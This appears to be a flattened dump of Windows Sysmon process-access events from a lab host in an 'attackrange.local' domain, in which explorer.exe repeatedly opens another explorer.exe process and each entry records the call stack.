22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 